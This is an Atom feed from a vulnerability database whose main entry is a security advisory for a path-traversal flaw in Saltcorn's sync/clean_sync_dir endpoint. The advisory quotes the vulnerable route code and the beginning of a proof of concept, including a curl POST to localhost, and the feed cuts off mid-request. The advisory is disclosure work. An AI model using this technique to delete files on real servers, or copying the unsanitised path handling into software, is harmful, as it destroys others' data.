<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
  <id>https://cve.radiocsirt.org/rss/recent/all/10</id>
  <title>Most recent entries from all</title>
  <updated>2026-10-08T20:43:32.569672+00:00</updated>
  <author>
    <name>Vulnerability-Lookup</name>
    <email>csirt@opendfir.org</email>
  </author>
  <link href="https://cve.radiocsirt.org" rel="alternate"/>
  <generator uri="https://lkiesow.github.io/python-feedgen" version="1.0.0">python-feedgen</generator>
  <subtitle>Contains only the most 10 recent entries.</subtitle>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/euvd-2026-193742</id>
    <title>EUVD-2026-193742</title>
    <updated>2026-10-08T20:43:32.618726+00:00</updated>
    <content>EUVD-2026-193742</content>
    <link href="https://cve.radiocsirt.org/vuln/euvd-2026-193742"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/fkie_cve-2024-47818</id>
    <title>fkie_cve-2024-47818</title>
    <updated>2026-10-08T20:43:32.618765+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml">
        <p>Saltcorn is an extensible, open source, no-code database application builder. A logged-in user with any role can delete arbitrary files on the filesystem by calling the `sync/clean_sync_dir` endpoint. The `dir_name` POST parameter is not validated/sanitized and is used to construct the `syncDir` that is deleted by calling `fs.rm`. This issue has been addressed in release version 1.0.0-beta16 and all users are advised to upgrade. There are no known workarounds for this vulnerability.</p>
      </div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/fkie_cve-2024-47818"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/ghsa-43f3-h63w-p6f6</id>
    <title>GHSA-43f3-h63w-p6f6 — Saltcorn Server allows logged-in users to delete arbitrary files because of a path traversal vulnerability</title>
    <updated>2026-10-08T20:43:32.618801+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> npm: @saltcorn/server</p>
<p>### Summary</p>
<p>A logged-in user with any role can delete arbitrary files on the filesystem by calling the `sync/clean_sync_dir` endpoint. The `dir_name` POST parameter is not validated/sanitized and is used to construct the `syncDir` that is deleted by calling `fs.rm`.</p>
<p>### Details</p>
<p>- file: https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.15/packages/server/routes/sync.js#L337-L346</p>
<p>```js
router.post(
  "/clean_sync_dir",
  error_catcher(async (req, res) =&gt; {
    const { dir_name } = req.body; // [1] source
    try {
      const rootFolder = await File.rootFolder();
      const syncDir = path.join(
        rootFolder.location,
        "mobile_app",
        "sync",
        dir_name // [2]
      );
      await fs.rm(syncDir, { recursive: true, force: true }); // [3] sink
      res.status(200).send("");
    } catch (error) {
      getState().log(2, `POST /sync/clean_sync_dir: '${error.message}'`);
      res.status(400).json({ error: error.message || error });
    }
  })
);
```</p>
<p>### PoC</p>
<p>The following PoC can be executed with a user with any role (`admin`, `staff`, `user`, `public`)</p>
<p>- create a file in a folder different from where the server is started:
```
touch /tmp/secret
cat /tmp/secret
```</p>
<p>- log with a user and retrieve valid `connect.sid` and `_csrf` values***
- send the following `curl` request
```
curl -i -X $'POST' \
  -H $'Host: localhost:3000' \
  -H $'Content-Type: application/x-www-form-urlencoded' \
  -H $'Content-Length: 93' \
  -H $'Origin: http://localhost…</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/ghsa-43f3-h63w-p6f6"/>
  </entry>
</feed>
